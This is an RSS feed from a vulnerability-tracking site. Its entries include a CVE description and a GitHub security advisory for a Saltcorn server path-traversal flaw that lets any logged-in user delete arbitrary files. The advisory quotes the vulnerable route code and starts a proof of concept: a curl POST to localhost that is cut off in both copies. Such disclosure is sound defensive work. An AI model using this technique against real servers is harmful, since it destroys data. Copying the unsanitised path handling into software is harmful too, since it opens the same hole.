<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Thu, 08 Oct 2026 21:44:01 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-193742</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-193742</link>
      <description>EUVD-2026-193742</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-193742</guid>
    </item>
    <item>
      <title>fkie_cve-2024-47818</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2024-47818</link>
      <description>&lt;p&gt;Saltcorn is an extensible, open source, no-code database application builder. A logged-in user with any role can delete arbitrary files on the filesystem by calling the `sync/clean_sync_dir` endpoint. The `dir_name` POST parameter is not validated/sanitized and is used to construct the `syncDir` that is deleted by calling `fs.rm`. This issue has been addressed in release version 1.0.0-beta16 and all users are advised to upgrade. There are no known workarounds for this vulnerability.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Saltcorn is an extensible, open source, no-code database application builder. A logged-in user with any role can delete arbitrary files on the filesystem by calling the `sync/clean_sync_dir` endpoint. The `dir_name` POST parameter is not validated/sanitized and is used to construct the `syncDir` that is deleted by calling `fs.rm`. This issue has been addressed in release version 1.0.0-beta16 and all users are advised to upgrade. There are no known workarounds for this vulnerability.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2024-47818</guid>
    </item>
    <item>
      <title>GHSA-43f3-h63w-p6f6 — Saltcorn Server allows logged-in users to delete arbitrary files because of a path traversal vulnerability</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-43f3-h63w-p6f6</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: @saltcorn/server&lt;/p&gt;
&lt;p&gt;### Summary&lt;/p&gt;
&lt;p&gt;A logged-in user with any role can delete arbitrary files on the filesystem by calling the `sync/clean_sync_dir` endpoint. The `dir_name` POST parameter is not validated/sanitized and is used to construct the `syncDir` that is deleted by calling `fs.rm`.&lt;/p&gt;
&lt;p&gt;### Details&lt;/p&gt;
&lt;p&gt;- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.15/packages/server/routes/sync.js#L337-L346&lt;/p&gt;
&lt;p&gt;```js
router.post(
  &amp;#34;/clean_sync_dir&amp;#34;,
  error_catcher(async (req, res) =&amp;gt; {
    const { dir_name } = req.body; // [1] source
    try {
      const rootFolder = await File.rootFolder();
      const syncDir = path.join(
        rootFolder.location,
        &amp;#34;mobile_app&amp;#34;,
        &amp;#34;sync&amp;#34;,
        dir_name // [2]
      );
      await fs.rm(syncDir, { recursive: true, force: true }); // [3] sink
      res.status(200).send(&amp;#34;&amp;#34;);
    } catch (error) {
      getState().log(2, `POST /sync/clean_sync_dir: &amp;#39;${error.message}&amp;#39;`);
      res.status(400).json({ error: error.message || error });
    }
  })
);
```&lt;/p&gt;
&lt;p&gt;### PoC&lt;/p&gt;
&lt;p&gt;The following PoC can be executed with a user with any role (`admin`, `staff`, `user`, `public`)&lt;/p&gt;
&lt;p&gt;- create a file in a folder different from where the server is started:
```
touch /tmp/secret
cat /tmp/secret
```&lt;/p&gt;
&lt;p&gt;- log with a user and retrieve valid `connect.sid` and `_csrf` values***
- send the following `curl` request
```
curl -i -X $&amp;#39;POST&amp;#39; \
  -H $&amp;#39;Host: localhost:3000&amp;#39; \
  -H $&amp;#39;Content-Type: application/x-www-form-urlencoded&amp;#39; \
  -H $&amp;#39;Content-Length: 93&amp;#39; \
  -H $&amp;#39;Origin: http://localhost…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: @saltcorn/server&lt;/p&gt;
&lt;p&gt;### Summary&lt;/p&gt;
&lt;p&gt;A logged-in user with any role can delete arbitrary files on the filesystem by calling the `sync/clean_sync_dir` endpoint. The `dir_name` POST parameter is not validated/sanitized and is used to construct the `syncDir` that is deleted by calling `fs.rm`.&lt;/p&gt;
&lt;p&gt;### Details&lt;/p&gt;
&lt;p&gt;- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.15/packages/server/routes/sync.js#L337-L346&lt;/p&gt;
&lt;p&gt;```js
router.post(
  &amp;#34;/clean_sync_dir&amp;#34;,
  error_catcher(async (req, res) =&amp;gt; {
    const { dir_name } = req.body; // [1] source
    try {
      const rootFolder = await File.rootFolder();
      const syncDir = path.join(
        rootFolder.location,
        &amp;#34;mobile_app&amp;#34;,
        &amp;#34;sync&amp;#34;,
        dir_name // [2]
      );
      await fs.rm(syncDir, { recursive: true, force: true }); // [3] sink
      res.status(200).send(&amp;#34;&amp;#34;);
    } catch (error) {
      getState().log(2, `POST /sync/clean_sync_dir: &amp;#39;${error.message}&amp;#39;`);
      res.status(400).json({ error: error.message || error });
    }
  })
);
```&lt;/p&gt;
&lt;p&gt;### PoC&lt;/p&gt;
&lt;p&gt;The following PoC can be executed with a user with any role (`admin`, `staff`, `user`, `public`)&lt;/p&gt;
&lt;p&gt;- create a file in a folder different from where the server is started:
```
touch /tmp/secret
cat /tmp/secret
```&lt;/p&gt;
&lt;p&gt;- log with a user and retrieve valid `connect.sid` and `_csrf` values***
- send the following `curl` request
```
curl -i -X $&amp;#39;POST&amp;#39; \
  -H $&amp;#39;Host: localhost:3000&amp;#39; \
  -H $&amp;#39;Content-Type: application/x-www-form-urlencoded&amp;#39; \
  -H $&amp;#39;Content-Length: 93&amp;#39; \
  -H $&amp;#39;Origin: http://localhost…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-43f3-h63w-p6f6</guid>
    </item>
  </channel>
</rss>
